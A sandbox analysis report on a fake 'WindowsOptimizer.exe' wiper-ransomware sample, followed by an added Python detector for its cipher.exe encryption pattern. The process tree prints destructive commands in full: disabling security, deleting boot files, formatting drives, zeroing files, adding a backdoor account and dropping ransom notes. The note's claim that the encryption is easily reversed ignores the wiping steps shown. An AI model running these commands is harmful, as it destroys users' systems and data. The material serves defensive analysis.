Analysis

  • max time kernel
    2s
  • max time network
    3s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    09-11-2024 21:27

General

  • Target

    WindowsOptimizer.exe

  • Size

    254KB

  • MD5

    5aaa262b518a3417e028e001152c9236

  • SHA1

    6d1cda51302d760509822b502a8f980537d17cb0

  • SHA256

    d4682419f76d71b863481d6e17ae0ed0cbbf06581aa2480ed304c66dd9072b5b

  • SHA512

    722d7c1a4f87c10f34e6500d1712414f159da8ca9cb02b0b9f44f8df717345cbff473cfe5c486837ad6c9e2487677c7e22c2974f7c36c320a83ffc16812ffbca

  • SSDEEP

    3072://w6PYqco8r88P7kHLWwZSO1qPZg6QpakmTjG0efuiWFExDYp1:1PYM8orWwgBeVuNpp1

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 5 IoCs
  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Enumerates connected drives 3 TTPs 3 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utility used to control services on the system.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Modifies registry key 1 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe
    "C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Suspicious use of WriteProcessMemory
    PID:1480
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1204
      • C:\Windows\system32\reg.exe
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        3⤵
        PID:4288
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4844
      • C:\Windows\system32\netsh.exe
        netsh advfirewall set allprofiles state off
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        PID:1172
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1484
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        • Modifies registry key
        PID:3044
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop wuauserv
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3944
      • C:\Windows\system32\sc.exe
        sc stop wuauserv
        3⤵
        • Launches sc.exe
        PID:216
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc config wuauserv start=disabled
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2708
      • C:\Windows\system32\sc.exe
        sc config wuauserv start=disabled
        3⤵
        • Launches sc.exe
        PID:4452
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3304
      • C:\Windows\system32\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:2416
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2036
      • C:\Windows\system32\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
        3⤵
        • Disables RegEdit via registry modification
        • Modifies registry key
        PID:4056
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1980
      • C:\Windows\system32\reg.exe
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
        3⤵
        PID:4872
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2148
      • C:\Windows\system32\reg.exe
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f
        3⤵
        PID:3528
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3588
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} recoveryenabled No
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:2984
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:856
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:3064
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\winload.exe
      2⤵
      PID:2516
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c net user TrojanUser0 ComplexPass123! /add
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2464
      • C:\Windows\system32\net.exe
        net user TrojanUser0 ComplexPass123! /add
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1764
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 user TrojanUser0 ComplexPass123! /add
          4⤵
          PID:3524
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Desktop" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1844
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AddConfirm.wm"
        3⤵
        PID:4996
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AddDisconnect.cab"
        3⤵
        PID:2076
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteCompare.ods"
        3⤵
        PID:4072
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteResize.mp3"
        3⤵
        PID:512
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DenyOptimize.zip"
        3⤵
        PID:1588
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\FormatSubmit.ps1"
        3⤵
        PID:2136
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\GrantGroup.dib"
        3⤵
        PID:3268
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\HideMerge.odt"
        3⤵
        PID:3264
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinMount.m1v"
        3⤵
        PID:2592
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinSelect.docx"
        3⤵
        PID:676
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\MergeSwitch.AAC"
        3⤵
        PID:3980
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\Microsoft Edge.lnk"
        3⤵
        PID:3040
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\OptimizeGet.dwfx"
        3⤵
        PID:4316
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PopInitialize.zip"
        3⤵
        PID:3060
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ReceiveConfirm.mpe"
        3⤵
        PID:1968
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RedoStop.asx"
        3⤵
        PID:4348
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RegisterRepair.svg"
        3⤵
        PID:4420
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ResolveStep.xsl"
        3⤵
        PID:4064
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SelectMove.MTS"
        3⤵
        PID:1220
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartOptimize.jpe"
        3⤵
        PID:3164
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartRestore.001"
        3⤵
        PID:1280
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StepSplit.wax"
        3⤵
        PID:2832
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SwitchSave.search-ms"
        3⤵
        PID:1900
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\UnblockLock.mp4v"
        3⤵
        PID:3436
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Desktop
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3628
      • C:\Windows\system32\cipher.exe
        cipher /E /A /S:C:\Users\Admin\Desktop
        3⤵
        PID:4220
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\*.dll
      2⤵
      PID:1760
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del /F /Q C:\bootmgr
      2⤵
      PID:4588
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c bcdedit /delete {bootmgr} /f
      2⤵
      PID:3400
      • C:\Windows\system32\bcdedit.exe
        bcdedit /delete {bootmgr} /f
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:3620
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c bcdedit /delete {default} /f
      2⤵
      PID:2320
      • C:\Windows\system32\bcdedit.exe
        bcdedit /delete {default} /f
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:4144
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c mountvol X: /s
      2⤵
      PID:2564
      • C:\Windows\system32\mountvol.exe
        mountvol X: /s
        3⤵
        PID:2468
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del /F /Q X:\EFI\Microsoft\Boot\*.*
      2⤵
      PID:2388
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c mountvol X: /d
      2⤵
      PID:3352
      • C:\Windows\system32\mountvol.exe
        mountvol X: /d
        3⤵
        • Enumerates connected drives
        PID:4972
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c format C: /fs:raw /q /y
      2⤵
      PID:3172
      • C:\Windows\system32\format.com
        format C: /fs:raw /q /y
        3⤵
        PID:920
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c format D: /fs:raw /q /y
      2⤵
      PID:4408
      • C:\Windows\system32\format.com
        format D: /fs:raw /q /y
        3⤵
        • Enumerates connected drives
        PID:2336
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c format E: /fs:raw /q /y
      2⤵
      PID:1316
      • C:\Windows\system32\format.com
        format E: /fs:raw /q /y
        3⤵
        • Enumerates connected drives
        PID:4016
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c bcdedit /delete {current} /f
      2⤵
      PID:792
      • C:\Windows\system32\bcdedit.exe
        bcdedit /delete {current} /f
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:4332
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
      2⤵
      PID:216
    • C:\Windows\system32\cmd.exe
      cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
      2⤵
      PID:388
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
      2⤵
      PID:3944
    • C:\Windows\system32\cmd.exe
      cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
      2⤵
      PID:2956
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
      2⤵
      PID:4452
    • C:\Windows\system32\cmd.exe
      cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
      2⤵
      PID:4268
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
      2⤵
      PID:2708
    • C:\Windows\system32\cmd.exe
      cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
      2⤵
      PID:2568
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
      2⤵
      PID:3484
    • C:\Windows\system32\cmd.exe
      cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
      2⤵
      PID:4924
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt
      2⤵
      PID:3304
    • C:\Windows\system32\cmd.exe
      cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt
      2⤵
      PID:4404
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents
      2⤵
      PID:4744
    • C:\Windows\system32\cmd.exe
      cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents
      2⤵
      PID:4356
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt
      2⤵
      PID:2004
    • C:\Windows\system32\cmd.exe
      cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt
      2⤵
                                                                                                                            PID:2036
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Pictures
                                                                                                                            2⤵
                                                                                                                              PID:3504
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              cmd.exe /c cipher /E /A /S:C:\Users\Admin\Pictures
                                                                                                                              2⤵
                                                                                                                                PID:3712
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Pictures\RANSOM_NOTE.txt
                                                                                                                                2⤵
                                                                                                                                  PID:3564
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Pictures\RANSOM_NOTE.txt
                                                                                                                                  2⤵
                                                                                                                                    PID:884
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Downloads
                                                                                                                                    2⤵
                                                                                                                                      PID:1960
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      cmd.exe /c cipher /E /A /S:C:\Users\Admin\Downloads
                                                                                                                                      2⤵
                                                                                                                                        PID:3032
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Downloads\RANSOM_NOTE.txt
                                                                                                                                        2⤵
                                                                                                                                          PID:1980
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Downloads\RANSOM_NOTE.txt
                                                                                                                                          2⤵
                                                                                                                                            PID:3720
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Music
                                                                                                                                            2⤵
                                                                                                                                              PID:3528
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              cmd.exe /c cipher /E /A /S:C:\Users\Admin\Music
                                                                                                                                              2⤵
                                                                                                                                                PID:4944
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Music\RANSOM_NOTE.txt
                                                                                                                                                2⤵
                                                                                                                                                  PID:2148
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Music\RANSOM_NOTE.txt
                                                                                                                                                  2⤵
                                                                                                                                                    PID:5052
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Videos
                                                                                                                                                    2⤵
                                                                                                                                                      PID:1228
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      cmd.exe /c cipher /E /A /S:C:\Users\Admin\Videos
                                                                                                                                                      2⤵
                                                                                                                                                        PID:688
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Videos\RANSOM_NOTE.txt
                                                                                                                                                        2⤵
                                                                                                                                                          PID:4212
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Videos\RANSOM_NOTE.txt
                                                                                                                                                          2⤵
                                                                                                                                                            PID:1660
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\AppData
                                                                                                                                                            2⤵
                                                                                                                                                              PID:3064
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              cmd.exe /c cipher /E /A /S:C:\Users\Admin\AppData
                                                                                                                                                              2⤵
                                                                                                                                                                PID:3580
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\AppData\RANSOM_NOTE.txt
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:856
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\AppData\RANSOM_NOTE.txt
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:5056
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Favorites
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:1400
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      cmd.exe /c cipher /E /A /S:C:\Users\Admin\Favorites
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:1464
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Favorites\RANSOM_NOTE.txt
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2812
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Favorites\RANSOM_NOTE.txt
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:4764
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:212
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              cmd.exe /c cipher /E /A /S:C:\
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:2292
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c cipher /E /A /S:D:\
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:812
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  cmd.exe /c cipher /E /A /S:D:\
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:4576
                                                                                                                                                                                • C:\Windows\system32\efsui.exe
                                                                                                                                                                                  efsui.exe /efs /keybackup
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                  PID:4232
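Analyst note on the tree above: the "encryption" is done entirely with the built-in cipher.exe (cipher /E /A /S:<dir>), i.e. Windows EFS under the current user's certificate, first per user folder and then over the whole C:\ and D:\ volumes, with a RANSOM_NOTE.txt echoed into each folder from the same parent. The efsui.exe /efs /keybackup process at the end is Windows' own prompt to back up the EFS certificate that is created on first use. Because EFS keys stay with the account that ran cipher, the affected user can normally reverse this with cipher /D /S:<dir> as long as that certificate and key have not been removed; nothing in this section of the report shows them being removed. The following detection logic is an added example written for this page, not part of the sandbox report or of the sample. It runs over constructed process-creation records (pid|ppid|image|command line, mapped from Sysmon Event ID 1 / Security 4688 / an EDR export, which is an assumption) and flags a parent process that both runs cipher /E and drops a note-like file, escalating when a whole drive root is in scope:

```python
"""Detect the cipher.exe / EFS ransomware pattern from the process tree above.

Added example (not part of the sandbox report). It assumes process-creation
events have been mapped to the constructed "pid|ppid|image|command line" shape
used in SAMPLE_EVENTS.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed records modelled on the tree above. Child PIDs and command lines are
# taken from the report; the parent PID 1234 (WindowsOptimizer.exe) and the benign
# events under parent 5555 are assumptions added for contrast.
SAMPLE_EVENTS = r"""
3304|1234|C:\Windows\system32\cmd.exe|C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt
4744|1234|C:\Windows\system32\cmd.exe|C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents
2004|1234|C:\Windows\system32\cmd.exe|C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt
212|1234|C:\Windows\system32\cmd.exe|C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\
812|1234|C:\Windows\system32\cmd.exe|C:\Windows\system32\cmd.exe /c cipher /E /A /S:D:\
7001|5555|C:\Windows\system32\cmd.exe|cmd.exe /c cipher /E /S:C:\Users\Admin\Secrets
7002|5555|C:\Windows\system32\cmd.exe|cmd.exe /c echo build ok > C:\Users\Admin\build.log
"""

# cipher.exe invocation and its argument string (stop at a command separator).
CIPHER_RE = re.compile(r"\bcipher(?:\.exe)?\s+(?P<args>[^&|]*)", re.IGNORECASE)
# /E = encrypt; it must be a standalone switch, not a prefix of another one.
ENCRYPT_FLAG = re.compile(r"(?:^|\s)/E(?=\s|$)", re.IGNORECASE)
# /S:<dir> scope; a bare drive root means the whole volume is targeted.
SCOPE_RE = re.compile(r'/S:(?P<path>"[^"]+"|\S+)', re.IGNORECASE)
DRIVE_ROOT = re.compile(r"[A-Za-z]:\\?")
# echo <text> > <file>: the note-dropping half of the pattern.
ECHO_RE = re.compile(r'\becho\s+(?P<text>.+?)\s*>>?\s*(?P<path>"[^"]+"|\S+)\s*$', re.IGNORECASE)
NOTE_WORDS = ("encrypted", "btc", "bitcoin", "pay", "decrypt", "ransom")


@dataclass
class Finding:
    parent_pid: int
    cipher_scopes: list[str] = field(default_factory=list)   # dirs passed to cipher /E
    note_paths: list[str] = field(default_factory=list)      # files that look like ransom notes

    @property
    def hit_drive_root(self) -> bool:
        return any(DRIVE_ROOT.fullmatch(p) for p in self.cipher_scopes)

    @property
    def is_ransomware_like(self) -> bool:
        # Require both halves from the same parent so a lone admin `cipher /E` is not flagged.
        return bool(self.cipher_scopes) and bool(self.note_paths)


def looks_like_ransom_note(text: str, path: str) -> bool:
    """Two ransom-note keywords in the echoed text, or a tell-tale file name."""
    lowered = text.lower()
    hits = sum(word in lowered for word in NOTE_WORDS)
    name = path.strip('"').rsplit("\\", 1)[-1].lower()
    return hits >= 2 or "ransom" in name


def parse_events(text: str):
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, ppid, image, cmd = line.split("|", 3)
        yield int(pid), int(ppid), image, cmd


def analyze(text: str) -> dict[int, Finding]:
    """Group cipher /E and note-drop events by parent PID; return only suspicious parents."""
    findings: dict[int, Finding] = {}
    for _pid, ppid, _image, cmd in parse_events(text):
        f = findings.setdefault(ppid, Finding(ppid))
        m = CIPHER_RE.search(cmd)
        if m and ENCRYPT_FLAG.search(m.group("args")):
            scope = SCOPE_RE.search(m.group("args"))
            f.cipher_scopes.append(scope.group("path").strip('"') if scope else ".")
        m = ECHO_RE.search(cmd)
        if m and looks_like_ransom_note(m.group("text"), m.group("path")):
            f.note_paths.append(m.group("path").strip('"'))
    return {ppid: f for ppid, f in findings.items() if f.is_ransomware_like}


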